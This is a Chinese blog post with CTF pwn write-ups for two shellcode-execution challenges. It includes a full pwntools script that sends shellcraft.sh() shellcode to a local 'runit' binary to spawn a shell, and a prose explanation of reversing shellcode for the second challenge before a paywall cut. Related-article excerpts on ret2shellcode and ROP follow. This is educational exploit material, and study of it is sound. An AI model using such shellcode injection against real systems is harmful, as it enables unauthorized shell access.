解析两道pwn题shellcode利用

最新推荐文章于 2024-08-23 17:36:53 发布
最新推荐文章于 2024-08-23 17:36:53 发布
阅读量2.1k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44113469/article/details/88421457
本文记录了解决两道pwn题目shellcode利用的方法。第一题通过pwntools构造shellcode注入内存并执行;第二题需考虑shellcode顺序颠倒,借助shell-storm上的shellcode完成挑战。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

两道题都是shellcode直接利用,简单记录解题的过程。
0x01 runit
在这里插入图片描述
逻辑不难,使用mmap()分配一块内存,然后通过read函数写入数据到这个内存块,接下来就直接执行我们输入的数据,所以可以直接利用pwntool构造shellcode注入到该内存块,完事。

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')
cn = process('./runit')
shell=shellcraft.sh()
offset=asm(shell)
cn.recvuntil('Send me stuff!!')
cn.sendline(offset)
cn.interactive()

执行
在这里插入图片描述

0x02 runitplusplus

在这里插入图片描述
这一题和前一题不同的是多了一个for循环,简单分析一下,for循环里进行三次异或运算,将buf里的数据顺序颠倒了,也就是说,我们注入的shellcode也要将顺序颠倒。这里我在一个著名网站shell-storm.org上找到一个shellcode代码

最低0.47元/天 解锁文章

200万优质内容无限畅学
梦回Altay
关注
PWN-shellcode
MuMuLee_的博客
09-26 1955
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。 目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
PWN基础11:手动制作shellcode并测试
prettyX的博客
07-14 965
用于测试shellcode的代码如下 #include <stdio.h> void main() { char *shellcode; read(0,shellcode,1000); void(*run)()=shellcode; run(); } 下面是我们要测试的shellcode,就是在上一节课,我们用到的 (上一节课:https://blog.youkuaiyun.com/prettyX/article/details/107301127) push
CTF-PWN-note-service2 (堆中shellcode执行)
SuperGate的博客
11-18 666
checksec Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments 发现没有开启NX,因此很有可能是要我们将sh...
基本ROP之ret2shellcode
至臻求学,胸怀云月
01-12 1743
原理 控制程序执行shellcode代码 shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 一般来说,shellcode需要我们自己进行填充,这其实是一种典型的利用方法。 执行条件: 对应二进制在执行时,shellcode所在区域需要可执行的权限。 过程 下载地址 查看程序保护机制 毫无保护 IDA看下汇编指令 发现gets危险函数 同时还有...
ret2shellcode知识点及例
weixin_44864859的博客
05-19 936
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
C++ PWN解析:ZJCTF 2019 Login漏洞利用
"BUUCTF-PWN-[ZJCTF 2019]Login 是一个关于网络安全竞赛中的Pwn(破解)类目,主要涉及到C++编程、汇编语言分析以及栈溢出漏洞的利用。" 该目描述了一个登录系统,参赛者需要通过输入正确的账号和密码来访问...
tuma五道入门pwn解析
weixin_44113469的博客
03-12 919
0x01 pwn1 只有v5==-559869752 成立,就能输出flag,查看v5位置,直接覆盖。 exp from pwn import * context(os='linux', arch='i386', log_level='debug') p = process('./pwn1.dms') p.recvuntil('What... is your name?\n') p.sendl...
CTF Pwn挑战解析:掌握Pwn型的必备技能
Pwn型通常涉及利用软件中的漏洞,如缓冲区溢出、栈溢出和堆溢出等,要求参赛者通过攻击实现权限提升或获取敏感信息。文章首先概述了Pwn型,随后深入探讨了基础知识,包括缓冲区溢出原理、栈与堆的内存管理、...
Pwn2Own 2010:Windows 7上的Internet Explorer 8漏洞利用解析
"Pwn2Own 2010 Windows 7 Internet Explorer 8 漏洞利用技术概述" 在2010年的Pwn2Own黑客大赛中,一位参赛者成功利用了Windows 7上的Internet Explorer 8(IE8)中的漏洞。这个攻击过程分为两个主要部分,展示了...
(shellcode注入攻击)ret2shellcode-栈上的ret2shellcode
2401_83500274的博客
08-14 852
用64ida打开发现如下情况,他输出了v4的地址,然后shift+F12没有发现什么后面函数和bin/sh字样,所以我们可以考虑用栈上的ret2shellcode来写。v4_addr = int(r.recvline()[33:-1],16)#这里接受的是printf里的,并且进行了切片操作,使得位v4地址并且转换为10进制。ret2shellcode,大致为bss段上的和栈上的shellcode。生成64位的shellcode,接收v4的地址,利用ljust覆盖填充,返回v4的地址。
pwnnum35----ret2shellcode
tbsqigongzi的博客
04-29 381
BUUCTF-PWN-ciscn_2019_n_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 未开启NX保护-----堆栈可执行,可注入shellcode 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,先是让我们输入一个name,之后让我们输入一些信息,什么也看不出来 ida一下 注意两个函数 read(0, name, 0x64uLL);
从零开始做:逆向 ret2shellcode orw
weixin_44626085的博客
01-28 947
下载orw时防病毒要关闭。
MIPS下shellcode编写二
Yale的博客
05-27 676
shellcode中我们常会看到execve系统调用,它常用来运行/bin/sh之类的应用程序。 我们来execve的原型 execve()用来执行参数filename字符串所代表的文件路径,第二个参数是利用指针数组来传递给执行文件,并且需要以空指针(NULL)结束,最后一个参数则为传递给执行文件的新环境变量数组。 这里为了方便,直接将后面两个参数置0 简单的看看c程序里execve的使用 代码在exe.c 编译 运行 可以看到execve函数执行了/bin/sh生成了一个shell 用汇编来写同
pwn shellcode
doudoudedi
11-03 829
漏洞函数很简单没开任何保护直接写入shellcoe读flag这里只允许open read write exp: from pwn import * import pwnlib context_arch='amd64' #p=process('./bad') p=remote('pwnto.fun',12301) elf=ELF('./bad') buf_addr=0x123000 jmp_rsp...
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 1039
CTF-wiki的注解:ret2shellcode
PWN · ret2shellcode | jmp rsp | jmp rsi】[广东省大学生攻防大赛 2022]jmp_rsp
Mr_Fmnwon的博客
03-05 1198
ret2shellcode,一般是往某个wx属性的地方写上shellcode,再尝试进行控制流劫持,跳转到shellcode处。一、目概述目并不难,没有套多少壳子,一眼漏洞。关注寄存器残留的值利用rsp和栈可写可执行,能够做很多事情。
pwn-shellcode执行
最新发布
GalaxySpaceX的博客
08-23 1504
pwn-shellcode执行
路由器漏洞复现终极奥义——基于MIPS的shellcode编写
01-21 1360
前言 今天我们来聊聊如何在MIPS架构中编写shellcode。在前面的两篇文章中,我们分别介绍了基于MIPS的缓冲区溢出实践,以及进一步的如何利用学到的溢出知识复现与验证路由器的漏洞。但是在上文的路由器漏洞利用的例子里面,我们需要有一个前置条件,即含有漏洞的程序必须导入了系统的库函数,我们才能方便的验证,然而这个条件并不是时刻有效的。因此,在本文中,我们介绍路由器漏洞复现的终极奥义——基于MI...
缓冲区溢出基础实践(一)——shellcode 与 ret2libc
weixin_34212189的博客
06-11 619
  最近结合软件安全课程上学习的理论知识和网络资料,对缓冲区溢出漏洞的简单原理和利用技巧进行了一定的了解。这里主要记录笔者通过简单的示例程序实现缓冲区溢出漏洞利用的步骤,按由简至繁的顺序,依次描述简单的 shellcode、ret2libc、ROP、Hijack GOT 等缓冲区溢出攻击技术的原理和步骤,以供总结和分享。为了保证缓冲区溢出实践能够顺利进行,需要对编译器选项和操作系统环境进行设置,可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值